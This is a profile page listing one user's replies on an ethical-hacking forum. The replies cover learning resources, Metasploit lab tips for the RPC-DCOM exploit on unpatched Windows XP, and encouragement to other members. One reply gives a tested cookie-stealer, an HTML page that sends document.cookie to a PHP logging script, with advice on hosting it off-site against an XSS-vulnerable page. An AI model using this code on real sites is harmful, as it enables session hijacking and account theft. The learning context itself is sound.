Gromic

Forum Replies Created

Viewing 14 reply threads
  • Author
    Posts
    • #49994
      Gromic
      Participant

      Another great resource to get started with exploit, assembler & co is opensecuritytraining http://opensecuritytraining.info/Training.html

      I found them a couple of days ago and already did their Intro x86 class, which I really liked a lot.

      Haven’t seen them mentioned anywhere here on EHN yet, so I thought I share the link for anybody who wants to get started with assembly, exploits, rootkits and other fun stuff.

      Their youtube channel is located here: http://www.youtube.com/user/OpenSecurityTraining/videos?flow=grid&view=1

      Happy hacking!

    • #47489
      Gromic
      Participant

      +1 to what unicityd wrote.

      @ZeroOne I agree with you on that. But as unicityd wrote … it’s not the point to have a working exploit with which you can hack a gazillion of machines, but to learn how Metasploit as a tool functions. And here I think for learning purposes it’s totally fine to follow along an “old” exploit just to see what options there are, how to use them …and so on… So, see it as a “walk before you can run” thing ;o).

      One thought on “who on earth will be using XP with no SPs”, though. Think about all the people who run a stolen/hacked copy of XP (or Vista or Win7) on their machines with update services disabled in panic of not getting caught … I heared this can be quite common in Third World countries. I don’t know any statistics to show this though… it was just a thought…so please don’t get me on this ;o)…

      But you are probably right, in times of vista, win7 an unpatched copy of XP might be rare… (at least I have no personal experience about that…)

      @ cyber.spirit
      I think the patch was originally after SP1(or2) and then later added to the SPs… that’s why we still see Win 2003 in target range in Metasploit (was that your question?!?)…not sure about this though…

      I really like the videos on securitytube. I am quite a fan of the “visual learning approach”….since I can better remember things when someone has shown me how to do it.

      Anyways, have fun with the video series!

    • #47484
      Gromic
      Participant

      Hi cyber.spirit

      I guess you go through Viveks Videos on Metasploit, right?!

      As far as I know the RPC-dcom exploit has been patched in SP1 or 2 …not 100% sure at the moment.

      However, the exploit will definately work with an unpatched Win XP – so no SPs (I tested that). Also make sure to disable any (Windows-) firewall.

    • #46895
      Gromic
      Participant

      Hi wlandymore,

      ok this might sound odd – and it’s just a thought …so don’t get me wrong, but do you start your html file in a “server-context” meaning is it in your htdocs or do you just open it on your harddrive?

      Since if you do the second it won’t work or at least you cannot read the cookies from localhost …(Happend to me too…an alertbox on the page worked however php script could’t read cookies…).

      For “debuggin” try to throw both scripts in your htdocs … and look if the php script gets the cookies…

      Don’t know if this helps, was just a thought….

      Cheers,
      -gromic

    • #46784
      Gromic
      Participant

      Hi wlandymore, hi ajohnson

      The following code (cookie_site.html and cookiestealer.php  ) should work (Seems that you just missed a / before your stealer script redirect in your html page).

      I tested it via a xampp setup and it worked.

      Just throw both of the files into your XAMPP htdocs.

      file: cookie_site.html



         
          document.cookie = "Test123";
         
       
          This page is a test
          alert(document.cookie)
          document.location = "/cookiestealer.php?cookie=" + document.cookie;
       

      file: cookiestealer.php


      <?php
        $cookie = $_GET;
        $log = fopen("cookielog.txt", "a");
        fwrite($log, $cookie ."n");
        fclose($log);
      ?>

      Note:

      • So far, page and stealer.php run on the same server (I know…not intended). When you move your stealer.php to another server you have to adjust your path i.e. “http:///cookiestealer.php?cookie=” … and so on..
      • One more tip: When debugging your scripts make sure you delete your browsers cache each time… very often I changed something but my browser (Chrome) showed me still the old results  ;D
      • cross domain issues should’t be a problem since as far as I understood the idea was to place the “stealer script” on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into “same orgin” issues..

      Hope this helps and works for you.

    • #46286
      Gromic
      Participant

      Hi Jamie,

      I am really sorry to hear that with your job. I second what everybody has written so far.
      From your posts here on EH-net as well as your site you seem really passionate about ITsec…So DON’T give up!

      “Our greatest glory is not in never failing, but in rising up every time we fail.”
      (Ralph Waldo Emerson)

      Since I am still in my masters and job hunting for me won’t start before august, this is the only “real advice” I can give you: “DON’T give up, if IT-Sec is really your passion!!”

      If I were in your situation, though, I would first ask your employer for a talk to elaborate on the exact reasons why they have fired you. This might hurt, but will give you valuable information on what you can improve the next time.

      Second I would right away start to apply for new pentesting jobs. Don’t let the “feeling of being not good enough” let you down or discourage you and get right into the game again!
      And only if this won’t work out for whatever reasons “too less job experience”, “too young”….blah blah… try to get a job as admin or what else…to build a solid foundation (always with the goal to learn something new…so no “brain death” jobs). 
      And never forget to focus on your goal or “dream job”!

      I wish you good luck and all the best!! And again: Don’t give up!

    • #46212
      Gromic
      Participant

      @ajohnson wrote:

      You can still donate $20 or something to help cover bandwidth, hosting, etc. I did this the other for the assembly and beginner exploitation videos.

      I did that today, too. I really appreciate the contents and already learned tons out of it.

      I think it’s a good thing to support, even though it’s free  (as in
      freedom not freebeer  😉 ), just to show the appreciation for the effort!

    • #45644
      Gromic
      Participant

      You might also find w3af interesting:
      http://w3af.sourceforge.net/

      It is also coded in Python.

    • #45217
      Gromic
      Participant

      Awesome! Can’t wait for the DVD!

      thx for the update lorddicranius

    • #45425
      Gromic
      Participant

      Welcome blue_hat,

      With programming languages it is always a matter of “the right tool for the right job”.  So as cd1zz mentioned it always depends on your goals.

      Nevertheless I think it is always good to have various programming languages on your “tool belt” since very often they help looking at problems in different ways. Because when holding only the same hammer in your hand …every problem somehow always looks like a nail… (and maybe not like a screw…) 

      Again Welcome to EH-Net!

    • #45434
      Gromic
      Participant

      Hi CeemGee and Welcome on EH-Network! Looking forward to read more from you in the future

    • #45455
      Gromic
      Participant

      Hi Jamie,

      Love your new design!! (have also been a visitor of your site when it had the old one)

      Wow, I am jealous , since setting up a page/blog is also on my toDo list for quite some time now (the domain is already set)… and your site is just what I had imagined  ;D.

      Maybe a bit off topic but I found out that you have removed the Syngress XSS Attack book from your “future” reading list ( If I can remember it right). 
      Any reasons for this? Since I bought it the other week and think it is quite an interesting read (read the first 100 pages so far). 
      Reading it always makes me shiver of what’s all possible with Xss…
      Anyways…getting back to the topic…

      Great page!  Good luck with it!

    • #45211
      Gromic
      Participant

      The Wifi-Sec iso file is 4,23 GB big ^^ Don’t know if they sell/ship it.

    • #45201
      Gromic
      Participant

      A site for a great overview of diffrent vulnerable systems/apps for a pentest lab is:
      http://g0tmi1k.blogspot.com/2011/03/vulnerable-by-design.html

    • #45031
      Gromic
      Participant

      heheh…way to go 3xban! Sorry, for putting you under peer pressure!

      I totally know what you mean on the “wasting time to gaming” part …It’s just frightening how much time (or better sleep…) one loses to such games… I just hope I will never get started with “Star Wars the old republic” … So far I have managed to stay away ^^

      Like you said, better put the time and effort into something more useful!!

Viewing 14 reply threads

Copyright ©2020 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?